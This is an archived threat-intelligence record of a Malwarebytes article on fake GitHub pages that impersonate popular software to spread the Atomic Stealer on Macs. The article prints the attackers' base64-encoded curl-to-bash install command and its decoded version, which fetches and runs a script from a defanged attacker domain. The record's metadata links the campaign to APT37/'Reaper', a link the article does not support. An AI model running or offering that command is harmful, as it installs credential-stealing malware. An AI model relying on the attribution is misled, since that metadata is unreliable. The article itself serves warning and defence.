{
	"id": "c1530010-ce0d-40e6-83ff-d668c3782559",
	"created_at": "2026-04-06T02:11:19.434012Z",
	"updated_at": "2026-04-10T03:38:06.629691Z",
	"deleted_at": null,
	"sha1_hash": "630d0db4ba89d6a54d48a993e27e8c94d727872a",
	"title": "Fake Malwarebytes, LastPass, and others on GitHub serve malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 514734,
	"plain_text": "Fake Malwarebytes, LastPass, and others on GitHub serve malware\r\nBy Pieter Arntz\r\nPublished: 2025-09-23 · Archived: 2026-04-06 01:38:19 UTC\r\nFake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.\r\nUnfortunately, Malwarebytes for Mac is one of them.\r\nImpersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.\r\nIn this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.\r\nThe LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.\r\nBut in other, less obvious cases, you may see search results like these:\r\nhttps://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\r\nPage 1 of 7\r\nThese only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.\r\nThe idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.\r\nIf someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.\r\nThe terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.\r\nHere’s a technical breakdown of the instructions provided to the visitor:\r\n/bin/bash -c \"\u003csomething\u003e\" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.\r\nThe part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.\r\n$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d): echo ... | base64 -d decodes the long base64 string.\r\ncurl -fsSL is a command to download data from the web. The options mean:\r\n-f: Fail silently for HTTP errors.\r\n-s: Silent mode (no progress bar).\r\n-S: Show errors if -s is used.\r\n-L: Follow redirects.\r\nSo, putting all this together:\r\nThe inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh\r\nThe outer command becomes: /bin/bash -c \"$(curl -fsSL https://gosreestr[.]com/hun/install.sh)\"\r\nSo, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.\r\nThis is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. And because it runs from the command line, it bypasses normal file download protections and can execute anything the attacker wants.\r\nThe download files have already been taken down, but users who recognize this chain of infection are advised to thoroughly check their machines for an infection.\r\nImpersonated software besides Malwarebytes and LastPass included:\r\n1Password\r\nActiveCampaign\r\nAfter Effects\r\nAudacity\r\nAuphonic\r\nBasecamp\r\nBetterSnapTool\r\nBiteable\r\nBitpanda\r\nBitsgap\r\nBlog2Social\r\nBlue Wallet\r\nBonkbot\r\nCarbon Copy Cloner\r\nCharles Schwab\r\nCitibank\r\nCMC Markets\r\nConfluence\r\nCoolors\r\nDaVinci Resolve\r\nDefiLlama\r\nDesktop Clockology\r\nDesygner\r\nDocker\r\nDropbox\r\nE-TRADE\r\nEigenLayer\r\nFidelity\r\nFliki\r\nFreqtrade Bot\r\nFreshworks\r\nGemini\r\nGMGN AI\r\nGunbot\r\nHemingway Editor\r\nHeyGen\r\nHootsuite\r\nHTX\r\nHypertracker\r\nIRS\r\nKeyBank\r\nLightstream\r\nLoopback\r\nMaestro Bot\r\nMelon\r\nMetatrader 5\r\nMetricool\r\nMixpanel\r\nMp3tag\r\nMural\r\nNFT Creator\r\nNotchNook\r\nNotion\r\nObsidian\r\nOnlypult\r\nPendle Finance\r\nPepperstone\r\nPipedrive\r\nPlus500\r\nPrivnote\r\nProWritingAid\r\nPubler\r\nRaycast\r\nReaper\r\nRecurPost\r\nRenderforest\r\nRippling\r\nRiverside.fm\r\nRobinhood\r\nRug AI\r\nSage Intacct\r\nSalesloft\r\nSentinelOne\r\nShippo\r\nShopify\r\nSocialPilot\r\nSoundtrap\r\nStreamYard\r\nSurferSEO\r\nThunderbird\r\nTweetDeck\r\nUphold\r\nVeeva CRM\r\nViraltag\r\nVSCO\r\nVyond\r\nWebull\r\nXai Games\r\nXSplit\r\nZealy\r\nZencastr\r\nZenefits\r\nZotero\r\nBut it’s highly likely that there will be more, so don’t see this as an exhaustive list.\r\nHow to stay safe\r\nBoth ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:\r\nNever run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.\r\nAlways download software from the official developer pages. If they do not host it themselves, verify the download links with them.\r\nAvoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.\r\nUse real-time anti-malware protection, preferably one that includes a web protection component.\r\nIf you have scanned your Mac and found the information stealer:\r\nRemove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.\r\nIf any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups.\r\nDo not reuse backups or Time Machine images that may be tainted by the infostealer.\r\nAfter reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.\r\nChange all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.\r\nIf all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.\r\nWe don’t just report on threats—we help safeguard your entire digital identity\r\nCybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.\r\nAbout the author\r\nWas a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.\r\nSource: https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware"
	],
	"report_names": [
		"fake-malwarebytes-lastpass-and-others-on-github-serve-malware"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441479,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.pdf",
		"text": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.txt",
		"img": "https://archive.orkl.eu/630d0db4ba89d6a54d48a993e27e8c94d727872a.jpg"
	}
}